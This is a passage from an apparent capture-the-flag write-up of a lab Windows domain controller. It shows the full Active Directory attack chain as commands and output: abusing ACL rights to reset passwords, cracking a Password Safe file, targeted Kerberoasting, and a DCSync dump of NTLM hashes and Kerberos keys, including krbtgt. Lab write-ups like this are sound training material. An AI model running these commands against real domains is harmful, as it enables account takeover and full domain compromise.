10.10.11.42</span><br><span class="line">Discovered open port 139/tcp on 10.10.11.42</span><br><span class="line">Discovered open port 53/tcp on 10.10.11.42</span><br><span class="line">Discovered open port 445/tcp on 10.10.11.42</span><br><span class="line">Discovered open port 3269/tcp on 10.10.11.42</span><br><span class="line">Discovered open port 464/tcp on 10.10.11.42</span><br><span class="line">Discovered open port 389/tcp on 10.10.11.42</span><br><span class="line">Discovered open port 5985/tcp on 10.10.11.42</span><br><span class="line">Discovered open port 88/tcp on 10.10.11.42</span><br><span class="line">Discovered open port 3268/tcp on 10.10.11.42</span><br><span class="line">Discovered open port 636/tcp on 10.10.11.42</span><br><span class="line">Discovered open port 593/tcp on 10.10.11.42</span><br><span class="line">Completed SYN Stealth Scan at 04:53, 6.15s elapsed (1000 total ports)</span><br><span class="line">Initiating Service scan at 04:53</span><br><span class="line">Scanning 13 services on 10.10.11.42</span><br><span class="line">Completed Service scan at 04:54, 62.13s elapsed (13 services on 1 host)</span><br><span class="line">NSE: Script scanning 10.10.11.42.</span><br><span class="line">Initiating NSE at 04:54</span><br><span class="line">Completed NSE at 04:54, 13.03s elapsed</span><br><span class="line">Initiating NSE at 04:54</span><br><span class="line">Completed NSE at 04:55, 22.87s elapsed</span><br><span class="line">Initiating NSE at 04:55</span><br><span class="line">Completed NSE at 04:55, 0.00s elapsed</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.11.42</span><br><span class="line">Host is up (1.5s latency).</span><br><span class="line">Not shown: 987 closed tcp ports (reset)</span><br><span class="line">PORT     STATE SERVICE       VERSION</span><br><span class="line">21/tcp   open  ftp           Microsoft ftpd</span><br><span class="line">| ftp-syst: </span><br><span class="line">|_  SYST: Windows_NT</span><br><span class="line">53/tcp   open  domain        Simple DNS Plus</span><br><span class="line">88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server <span class="keyword">time</span>: 2025-02-18 16:53:48Z)</span><br><span class="line">135/tcp  open  msrpc         Microsoft Windows RPC</span><br><span class="line">139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn</span><br><span class="line">389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)</span><br><span class="line">445/tcp  open  microsoft-ds?</span><br><span class="line">464/tcp  open  kpasswd5?</span><br><span class="line">593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0</span><br><span class="line">636/tcp  open  tcpwrapped</span><br><span class="line">3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)</span><br><span class="line">3269/tcp open  tcpwrapped</span><br><span class="line">5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)</span><br><span class="line">|_http-server-header: Microsoft-HTTPAPI/2.0</span><br><span class="line">|_http-title: Not Found</span><br><span class="line">Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span class="line">| smb2-time: </span><br><span class="line">|   <span class="built_in">date</span>: 2025-02-18T16:54:44</span><br><span class="line">|_  start_date: N/A</span><br><span class="line">| smb2-security-mode: </span><br><span class="line">|   3:1:1: </span><br><span class="line">|_    Message signing enabled and required</span><br><span class="line">|_clock-skew: 6h59m58s</span><br><span class="line"></span><br><span class="line">NSE: Script Post-scanning.</span><br><span class="line">Initiating NSE at 04:55</span><br><span class="line">Completed NSE at 04:55, 0.00s elapsed</span><br><span class="line">Initiating NSE at 04:55</span><br><span class="line">Completed NSE at 04:55, 0.00s elapsed</span><br><span class="line">Initiating NSE at 04:55</span><br><span class="line">Completed NSE at 04:55, 0.00s elapsed</span><br><span class="line">Read data files from: /usr/share/nmap</span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 104.72 seconds</span><br><span class="line">          Raw packets sent: 1097 (48.268KB) | Rcvd: 1098 (43.976KB)</span><br><span class="line">➜  Administrator </span><br></pre></td></tr></table></figure></div><h4 id="Olivia-credential-validation"><a href="#Olivia-credential-validation" class="headerlink" title="Olivia credential validation"></a>Olivia credential validation</h4>  <div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  Administrator cme smb administrator.htb -u <span class="string">&#x27;olivia&#x27;</span> -p <span class="string">&#x27;ichliebedich&#x27;</span></span><br><span class="line">SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.11.42     445    DC               [+] administrator.htb\olivia:ichliebedich </span><br><span class="line">➜  Administrator </span><br></pre></td></tr></table></figure></div><h3 id="Bloodhound"><a href="#Bloodhound" class="headerlink" title="Bloodhound"></a>Bloodhound</h3><p>  Next, we use BloodHound to enumerate potential privilege escalation paths for Olivia:<br>  <div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">➜  Administrator bloodhound-python -ns 10.10.11.42 -d administrator.htb -u <span class="string">&#x27;olivia&#x27;</span> -p <span class="string">&#x27;ichliebedich&#x27;</span> --zip -c all --dns-tcp</span><br><span class="line">INFO: BloodHound.py <span class="keyword">for</span> BloodHound LEGACY (BloodHound 4.2 and 4.3)</span><br><span class="line">INFO: Found AD domain: administrator.htb</span><br><span class="line">INFO: Getting TGT <span class="keyword">for</span> user</span><br><span class="line">INFO: Connecting to LDAP server: dc.administrator.htb</span><br><span class="line">INFO: Found 1 domains</span><br><span class="line">INFO: Found 1 domains <span class="keyword">in</span> the forest</span><br><span class="line">INFO: Found 1 computers</span><br><span class="line">INFO: Connecting to LDAP server: dc.administrator.htb</span><br><span class="line">INFO: Found 11 <span class="built_in">users</span></span><br><span class="line">INFO: Found 53 <span class="built_in">groups</span></span><br><span class="line">INFO: Found 2 gpos</span><br><span class="line">INFO: Found 1 ous</span><br><span class="line">INFO: Found 19 containers</span><br><span class="line">INFO: Found 0 trusts</span><br><span class="line">INFO: Starting computer enumeration with 10 workers</span><br><span class="line">INFO: Querying computer: dc.administrator.htb</span><br><span class="line">INFO: Done <span class="keyword">in</span> 01M 40S</span><br><span class="line">INFO: Compressing output into 20250218120443_bloodhound.zip</span><br><span class="line">➜  Administrator </span><br></pre></td></tr></table></figure></div></p><h4 id="Resetting-Michael’s-Password-via-Olivia’s-GenericWrite"><a href="#Resetting-Michael’s-Password-via-Olivia’s-GenericWrite" class="headerlink" title="Resetting Michael’s Password via Olivia’s GenericWrite"></a>Resetting Michael’s Password via Olivia’s GenericWrite</h4><p>  After checking Bloodhound we are able to seee that <code>Olivia</code> has <code>GenericAll</code> permission on <code>Michael</code> user. So we will use bloodyAD for changing password of <code>Michael</code>.<br>  <img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Administrator/olivia-generic-write.png"                                     ><br>  <div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  Administrator bloodyAD --host <span class="string">&#x27;10.10.11.42&#x27;</span> -d <span class="string">&#x27;administrator.htb&#x27;</span> -u <span class="string">&#x27;olivia&#x27;</span> -p <span class="string">&#x27;ichliebedich&#x27;</span> <span class="built_in">set</span> password <span class="string">&#x27;MICHAEL&#x27;</span> <span class="string">&#x27;ichliebedich&#x27;</span></span><br><span class="line">[+] Password changed successfully!</span><br></pre></td></tr></table></figure></div></p><h4 id="Validating-Credentials-for-Michael"><a href="#Validating-Credentials-for-Michael" class="headerlink" title="Validating Credentials for Michael"></a>Validating Credentials for Michael</h4>  <div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  Administrator cme smb administrator.htb -u &#x27;michael&#x27; -p &#x27;ichliebedich&#x27;</span><br><span class="line">SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.11.42     445    DC               [+] administrator.htb\michael:ichliebedich </span><br><span class="line">➜  Administrator </span><br></pre></td></tr></table></figure></div><h4 id="Resetting-Benjamin’s-Password-via-ForceChangePassword"><a href="#Resetting-Benjamin’s-Password-via-ForceChangePassword" class="headerlink" title="Resetting Benjamin’s Password via ForceChangePassword"></a>Resetting Benjamin’s Password via ForceChangePassword</h4><p>  <img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Administrator/michael-force-change-pass.png"                                     ><br>  Checking bloodhound again we can see <code>Michael</code> has <code>ForcechangePassword</code> permission on <code>Benjamin</code> user. So we use BloodyAD again to change <code>Benjamin&#39;s</code> password.<br>  <div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  Administrator bloodyAD --host <span class="string">&#x27;10.10.11.42&#x27;</span> -d <span class="string">&#x27;administrator.htb&#x27;</span> -u <span class="string">&#x27;michael&#x27;</span> -p <span class="string">&#x27;ichliebedich&#x27;</span> <span class="built_in">set</span> password <span class="string">&#x27;benjamin&#x27;</span> <span class="string">&#x27;ichliebedich&#x27;</span></span><br><span class="line">[+] Password changed successfully!</span><br></pre></td></tr></table></figure></div></p><h4 id="Validating-Credentials-for-Benjamin"><a href="#Validating-Credentials-for-Benjamin" class="headerlink" title="Validating Credentials for Benjamin"></a>Validating Credentials for Benjamin</h4>  <div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  Administrator nxc smb administrator.htb -u &#x27;benjamin&#x27; -p &#x27;ichliebedich&#x27;                                                       </span><br><span class="line">SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.11.42     445    DC               [+] administrator.htb\benjamin:ichliebedich </span><br><span class="line">➜  Administrator </span><br></pre></td></tr></table></figure></div><h3 id="FTP"><a href="#FTP" class="headerlink" title="FTP"></a>FTP</h3><p>  Now after changing <code>Benjamins</code> password i don’t see that much permission or anything in Bloodhound. So i checked for FTP access, since we have FTP port 21 open.<br>  <div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  Administrator cme ftp administrator.htb -u <span class="string">&#x27;benjamin&#x27;</span> -p <span class="string">&#x27;ichliebedich&#x27;</span> </span><br><span class="line">FTP         administrator.htb 21     administrator.htb [*] Banner: Microsoft FTP Service</span><br><span class="line">FTP         administrator.htb 21     administrator.htb [+] benjamin:ichliebedich</span><br></pre></td></tr></table></figure></div><br>  After successfull authentication i was able to login and get a psafe3 file from FTP.<br>  <div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">➜  Administrator ftp 10.10.11.42                                                                                                           </span><br><span class="line">Connected to 10.10.11.42.</span><br><span class="line">220 Microsoft FTP Service</span><br><span class="line">Name (10.10.11.42:kali): benjamin</span><br><span class="line">331 Password required</span><br><span class="line">Password: </span><br><span class="line">230 User logged <span class="keyword">in</span>.</span><br><span class="line">Remote system <span class="built_in">type</span> is Windows_NT.</span><br><span class="line">ftp&gt; <span class="built_in">ls</span></span><br><span class="line">229 Entering Extended Passive Mode (|||57121|)</span><br><span class="line">125 Data connection already open; Transfer starting.</span><br><span class="line">10-05-24  08:13AM                  952 Backup.psafe3</span><br><span class="line">226 Transfer complete.</span><br><span class="line">ftp&gt; get Backup.psafe3</span><br><span class="line"><span class="built_in">local</span>: Backup.psafe3 remote: Backup.psafe3</span><br><span class="line">229 Entering Extended Passive Mode (|||57124|)</span><br><span class="line">125 Data connection already open; Transfer starting.</span><br><span class="line">100% |*********************************************************************************************************************************************************************|   952        1.14 KiB/s    00:00 ETA</span><br><span class="line">226 Transfer complete.</span><br><span class="line">WARNING! 3 bare linefeeds received <span class="keyword">in</span> ASCII mode.</span><br><span class="line">File may not have transferred correctly.</span><br><span class="line">952 bytes received <span class="keyword">in</span> 00:01 (0.79 KiB/s)</span><br><span class="line">ftp&gt; <span class="built_in">exit</span></span><br><span class="line">221 Goodbye.</span><br><span class="line">➜  Administrator </span><br></pre></td></tr></table></figure></div></p><h3 id="Cracking-Password-Safe-psafe3-with-John-the-Ripper"><a href="#Cracking-Password-Safe-psafe3-with-John-the-Ripper" class="headerlink" title="Cracking Password Safe (.psafe3) with John the Ripper"></a>Cracking Password Safe (.psafe3) with John the Ripper</h3><p>  Since that <code>.psafe3</code> file is password protected i used <code>pwsafe2john</code> to crack the password using john.<br>  <div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">➜  Administrator pwsafe2john Backup.psafe3 &gt; psafe-hash</span><br><span class="line">➜  Administrator john psafe-hash --wordlist=/usr/share/wordlists/rockyou.txt </span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 1 password <span class="built_in">hash</span> (pwsafe, Password Safe [SHA256 128/128 AVX 4x])</span><br><span class="line">Cost 1 (iteration count) is 2048 <span class="keyword">for</span> all loaded hashes</span><br><span class="line">Will run 4 OpenMP threads</span><br><span class="line">Press <span class="string">&#x27;q&#x27;</span> or Ctrl-C to abort, almost any other key <span class="keyword">for</span> status</span><br><span class="line">tekieromucho     (Backu)     </span><br><span class="line">1g 0:00:00:00 DONE (2025-02-18 12:16) 2.777g/s 17066p/s 17066c/s 17066C/s newzealand..iheartyou</span><br><span class="line">Use the <span class="string">&quot;--show&quot;</span> option to display all of the cracked passwords reliably</span><br><span class="line">Session completed. </span><br><span class="line">➜  Administrator </span><br></pre></td></tr></table></figure></div><br>  With that password i opened psafe file with (<a class="link"   href="https://github.com/pwsafe/pwsafe" >pwsafe<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a>)<br>  <img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Administrator/psafe-1.png"                                     ><br>  <img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Administrator/psafe-2.png"                                     ></p><h4 id="Validating-Emily’s-Credentials-from-Psafe-for-SMB"><a href="#Validating-Emily’s-Credentials-from-Psafe-for-SMB" class="headerlink" title="Validating Emily’s Credentials from Psafe for SMB"></a>Validating Emily’s Credentials from Psafe for SMB</h4><p>  I validated all users and associated password with crackmapexec and <code>emily</code> was a user with valid password.<br>  <div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">➜  Administrator crackmapexec smb administrator.htb -u emma -p WwANQWnmJnGV07WQN8bMS7FMAbjNur</span><br><span class="line">SMB         administrator.htb 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         administrator.htb 445    DC               [-] administrator.htb\emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE </span><br><span class="line">➜  Administrator crackmapexec smb administrator.htb -u alexander -p UrkIbagoxMyUGw0aPlj9B0AXSea4Sw                         </span><br><span class="line">SMB         administrator.htb 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         administrator.htb 445    DC               [-] administrator.htb\alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE </span><br><span class="line">➜  Administrator crackmapexec smb administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb                                  </span><br><span class="line">SMB         administrator.htb 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         administrator.htb 445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb </span><br><span class="line">➜  Administrator </span><br></pre></td></tr></table></figure></div></p><h4 id="Kerberoasting-with-GenericWrite-Cracking-Ethan’s-Account"><a href="#Kerberoasting-with-GenericWrite-Cracking-Ethan’s-Account" class="headerlink" title="Kerberoasting with GenericWrite: Cracking Ethan’s Account"></a>Kerberoasting with GenericWrite: Cracking Ethan’s Account</h4><p>  After checking bloodhound, I saw <code>emily</code> had a <code>GenericWrite</code> permission on <code>ethan</code> user, so used <a class="link"   href="https://github.com/ShutdownRepo/targetedKerberoast" >targetedKerberoast.py<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a> for getting kerberoast hash of <code>ethan</code>.<br>  <img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Administrator/emily-generic-write.png"                                     ><br>  <div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">➜  Administrator targetedKerberoast.py -v -d <span class="string">&#x27;administrator.htb&#x27;</span> -u <span class="string">&#x27;emily&#x27;</span> -p <span class="string">&#x27;UXLCI5iETUsIBoFVTj8yQFKoHjXmb&#x27;</span></span><br><span class="line">[*] Starting kerberoast attacks</span><br><span class="line">[*] Fetching usernames from Active Directory with LDAP</span><br><span class="line">[VERBOSE] SPN added successfully <span class="keyword">for</span> (ethan)</span><br><span class="line">[+] Printing <span class="built_in">hash</span> <span class="keyword">for</span> (ethan)</span><br><span class="line">$krb5tgs$23$*ethan<span class="variable">$ADMINISTRATOR</span>.HTB<span class="variable">$administrator</span>.htb/ethan*$2c651041216ff1c252c13972700a9092<span class="variable">$87c31393c1caa8d7c7226f2c772d7441ffd1daee5be02cbe9f6c4945c132d00ff0a99fa9c7492f98ff3b09dbdb707aad940a552ca7744779ea89d47b7a5aeeb7e264529072314ddf8eaf00a73198c15208d76054772602f4621dd487794750f02ac924c080e9e7ad4f943c89a3139722b175ad1391c8317111939cc6f854f29749ca2fa6eae9ec0d891a2c3ea425df608769a7dfd521c3c28a35eddd74b120e7304fabc4d55399edc01302bcf1352815271e201e55cec607912bac2dc805c0cdb8ce23d17fd1dc1c0af0301cd45a5bbaedadd8f178d6b8b8ccb7a9974008b6dbf1d74106115a38b36cced894d1736c051e767e67384f8c1f9766ce702c5bf817fe724457df42c4663b916cfa5e2ba543605eb119d37cf1b37b9fe574c6f5e11007e03e47c7759564319caa4db2f98c195175e2b3ec88bc835781dc8b570e37b1e55dbfddb13dc6115e8d543dde140ddab2f2bee0e045345d884264d23862a07d70b5477005cc85a2178e943bcfeb22af04925564b35c8783e54c9290ca0e0c70a38ebb49bb268af140f5a6b992be16c86728218b5cd09f69c34f03ba087b99ae167829748b3e49e168927fb73f72ce1a1ae216247128f9591e503c5820b5324ba2f1faa8258abab90caa1ca084d30af703c16b24f5be5718619fe7895238bf8c8082dae8e43239a28769c43581c14a38abde0c9eafcab7b9cbb615de04b15ca6eed670e2840f88fb10d763b8a2181ea626a0c1ab9b8d0da15c7bc04d75cde504b57e298ebdc5dcc9fac4f288bd48820850add10fc3f68baa0930894991da21563e26751b6ba39df818656ba7fc0441c3f702dc839ea64927e7a544bd9547746f4fe4001729a153d6cf562a42a895eac7d34ec94e7aa7ff512541f7325e01c76a6a857f704794de0714bf894e0e6ca89692ba230fe6c01896002579101d7aad484ea9227380d531081b334403367a2e43fadd15c009b78ef98cb429ef3091593b3115a6c891ebe664abc5a0d3408a53aac715627b257c3e4457649c0864da117d23cc47b0763bfc65a37c884dc3efca84d23f3c4af52408da5877bbdb8cd812f3399a643e75eafa320cdcdd5e17411eba5dbc2bc158580a56a54457ad027bddc10f3619db945cd131778f03a87e2d4c237a3891259d65353b979f1b0207ca5c4618602e56230168c0721e26a8a9150754826782970b1dd9c80ff91b6c3c191c1e1a0a7496f3ad902704c61de14a3a096e1a36044d6911233bdf5aa45274ea2dd8333ebd7e41c6e0dfa15c99d695d385472f794c303c5d2d21146e69db9ed1870af828ec5b380939fa0163b86a20130788a9b30c1c5c96e2acca2842c12cfb89a6a79b5e03547f14a7284604314052274aee12e7ef1ad062ce56e56bcea5011d7f098f428f238f0ab1a2631112f687ae92623d36940bac8877088aa2565fd4d594ce4f499bbe752fc90b23e9bebb6dc3b6338c40ec27c364905d905a6156e881572444df15519ed9c60cfc11482a409e3594d52ad429b1134559c8de36901300</span></span><br><span class="line">[VERBOSE] SPN removed successfully <span class="keyword">for</span> (ethan)</span><br><span class="line">➜  Administrator </span><br></pre></td></tr></table></figure></div></p><h4 id="John-the-Ripper-for-Kerberos-Hash-Cracking"><a href="#John-the-Ripper-for-Kerberos-Hash-Cracking" class="headerlink" title="John the Ripper for Kerberos Hash Cracking"></a>John the Ripper for Kerberos Hash Cracking</h4><p>  <code>Ethan&#39;s</code> hash was crackable and we got password.<br>  <div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">➜  Administrator john kerb-hash --wordlist=/usr/share/wordlists/rockyou.txt </span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 1 password <span class="built_in">hash</span> (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])</span><br><span class="line">Will run 4 OpenMP threads</span><br><span class="line">Press <span class="string">&#x27;q&#x27;</span> or Ctrl-C to abort, almost any other key <span class="keyword">for</span> status</span><br><span class="line">limpbizkit       (?)     </span><br><span class="line">1g 0:00:00:00 DONE (2025-02-18 12:26) 20.00g/s 102400p/s 102400c/s 102400C/s newzealand..babygrl</span><br><span class="line">Use the <span class="string">&quot;--show&quot;</span> option to display all of the cracked passwords reliably</span><br><span class="line">Session completed. </span><br><span class="line">➜  Administrator </span><br></pre></td></tr></table></figure></div></p><h4 id="Credential-validation-for-Ethan"><a href="#Credential-validation-for-Ethan" class="headerlink" title="Credential validation for Ethan"></a>Credential validation for Ethan</h4>  <div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  Administrator crackmapexec smb administrator.htb -u <span class="string">&#x27;ethan&#x27;</span> -p <span class="string">&#x27;limpbizkit&#x27;</span>  </span><br><span class="line">SMB         administrator.htb 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         administrator.htb 445    DC               [+] administrator.htb\ethan:limpbizkit </span><br></pre></td></tr></table></figure></div><h3 id="Dsync"><a href="#Dsync" class="headerlink" title="Dsync"></a>Dsync</h3><p>  Upon checking Bloodhound again i found that <code>ethan</code> had Dsync permission so used secretsdump to dump all hashes.<br>  <img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Administrator/dsync.png"                                     ><br>  <div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">➜  Administrator secretsdump.py <span class="string">&#x27;administrator.htb&#x27;</span>/<span class="string">&#x27;ethan&#x27;</span>:<span class="string">&#x27;limpbizkit&#x27;</span>@administrator.htb</span><br><span class="line">Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied </span><br><span class="line">[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)</span><br><span class="line">[*] Using the DRSUAPI method to get NTDS.DIT secrets</span><br><span class="line">Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::</span><br><span class="line">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::</span><br><span class="line">administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::</span><br><span class="line">administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::</span><br><span class="line">administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::</span><br><span class="line">administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::</span><br><span class="line">administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::</span><br><span class="line">administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::</span><br><span class="line">administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::</span><br><span class="line">DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::</span><br><span class="line">[*] Kerberos keys grabbed</span><br><span class="line">Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664</span><br><span class="line">Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2</span><br><span class="line">Administrator:des-cbc-md5:403286f7cdf18385</span><br><span class="line">krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648</span><br><span class="line">krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94</span><br><span class="line">krbtgt:des-cbc-md5:2c0bc7d0250dbfc7</span><br><span class="line">administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3</span><br><span class="line">administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48</span><br><span class="line">administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9</span><br><span 